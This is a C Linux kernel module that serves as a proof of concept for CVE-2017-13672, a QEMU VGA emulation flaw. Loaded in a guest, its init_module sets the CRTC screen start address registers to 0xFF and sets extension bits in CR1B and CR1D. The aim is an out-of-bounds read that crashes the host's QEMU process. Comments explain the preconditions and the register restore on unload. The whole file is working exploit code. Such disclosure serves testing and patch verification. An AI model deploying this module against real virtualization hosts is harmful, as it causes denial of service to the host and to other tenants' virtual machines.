#define LINUX
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <asm/io.h>
#define DRIVER_AUTHOR "David Buchanan"
#define DRIVER_DESC "CVE-2017-13672 POC"
/* From qemu/hw/display/vga_regs.h */
#define VGA_CRT_IC 0x3D4 /* CRT Controller Index - color emulation */
#define VGA_CRT_DC 0x3D5 /* CRT Controller Data Register - color emulation */
/* From CL-GD5446 Technical Reference Manual */
#define VGA_CRC 0x0C /* CRTC Screen Start Address High Register */
#define VGA_CRD 0x0D /* CRTC Screen Start Address Low Register */
#define VGA_CR1B 0x1B /* Extended Display Controls Register */
#define VGA_CR1D 0x1D /* Overlay Extended Control Register */
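/*
 * Original contents of the four CRTC registers this module modifies.
 * init_module() captures them before changing anything and
 * cleanup_module() writes them back on unload.
 *
 * Declared static: they are only used inside this file, so there is no
 * reason to expose them as global symbols.
 */
static unsigned char crc_bak;	/* CRTC Screen Start Address High (0x0C) */
static unsigned char crd_bak;	/* CRTC Screen Start Address Low (0x0D) */
static unsigned char cr1b_bak;	/* Extended Display Controls (0x1B) */
static unsigned char cr1d_bak;	/* Overlay Extended Control (0x1D) */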
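/*
 * Read one CRT controller register.
 *
 * The CRTC is reached through an index/data port pair: the register
 * number is written to VGA_CRT_IC, then the value is read back from
 * VGA_CRT_DC. The two port accesses are not protected by any lock in
 * this helper.
 *
 * reg: index of the CRTC register to read.
 * Returns the byte read from the data port.
 *
 * static: only called from within this file.
 */
static unsigned char vga_crt_read(unsigned char reg)
{
	outb_p(reg, VGA_CRT_IC);
	return inb_p(VGA_CRT_DC);
}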
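/*
 * Write one CRT controller register.
 *
 * Selects the register by writing its number to VGA_CRT_IC, then writes
 * the new value to VGA_CRT_DC. Note the argument order: value first,
 * register index second. No lock is taken around the two port writes.
 *
 * val: byte to store in the register.
 * reg: index of the CRTC register to write.
 *
 * static: only called from within this file.
 */
static void vga_crt_write(unsigned char val, unsigned char reg)
{
	outb_p(reg, VGA_CRT_IC);
	outb_p(val, VGA_CRT_DC);
}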
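/*
 * Module entry point for the CVE-2017-13672 proof of concept.
 *
 * Saves the current CRC, CRD, CR1B and CR1D values, then writes 0xFF to
 * both Screen Start Address registers and ORs extra bits into CR1B and
 * CR1D. Per the public CVE description, an affected QEMU VGA emulator
 * can then read out of bounds during a display update and crash the
 * QEMU process (denial of service); the fix belongs on the host, in a
 * QEMU build that carries the patch for this CVE.
 *
 * Preconditions and caveats visible from this code:
 *  - It runs as a kernel module, so it needs the privilege to load
 *    modules in the guest.
 *  - Ports 0x3D4/0x3D5 are written unconditionally; nothing checks that
 *    the display adapter is the emulated device before reprogramming it.
 *
 * Always returns 0, so the module stays loaded and cleanup_module() can
 * later restore the saved values.
 */
int init_module(void)
{
	printk(KERN_ALERT "Attempting to exploit CVE-2017-13672...\n");

	/* Capture the originals before any write so unload can undo them. */
	crc_bak = vga_crt_read(VGA_CRC);
	crd_bak = vga_crt_read(VGA_CRD);
	cr1b_bak = vga_crt_read(VGA_CR1B);
	cr1d_bak = vga_crt_read(VGA_CR1D);

	/* Screen start address, high and low byte, set to their maximum. */
	vga_crt_write(0xFF, VGA_CRC);
	vga_crt_write(0xFF, VGA_CRD);

	/*
	 * 0x0D sets bits 0, 2 and 3 of CR1B; 0x80 sets bit 7 of CR1D. The
	 * other bits keep their saved values.
	 * NOTE(review): presumably these are the start-address extension
	 * bits of the CL-GD5446 - confirm against the Technical Reference
	 * Manual named at the top of this file.
	 */
	vga_crt_write(cr1b_bak | 0x0D, VGA_CR1B);
	vga_crt_write(cr1d_bak | 0x80, VGA_CR1D); // usually only this bit needs to be set

	return 0;
}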
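/*
 * Module exit point: writes the four register values saved by
 * init_module() back to the CRTC.
 *
 * This code can only run if the guest is still alive at unload time,
 * which is why the message treats reaching it as a negative result for
 * the CVE-2017-13672 test. The restore is best effort: the values are
 * written back without reading them again to confirm they took effect.
 */
void cleanup_module(void)
{
	/*
	 * Explicit log level added; the original call had none and relied
	 * on the kernel's default message level.
	 */
	printk(KERN_WARNING "If you got this far, exploitation was unsuccessful. Attempting to unload CVE-2017-13672. This may or may not fix your graphics.\n");

	/* Restore in the same register order the values were saved in. */
	vga_crt_write(crc_bak, VGA_CRC);
	vga_crt_write(crd_bak, VGA_CRD);
	vga_crt_write(cr1b_bak, VGA_CR1B);
	vga_crt_write(cr1d_bak, VGA_CR1D);
}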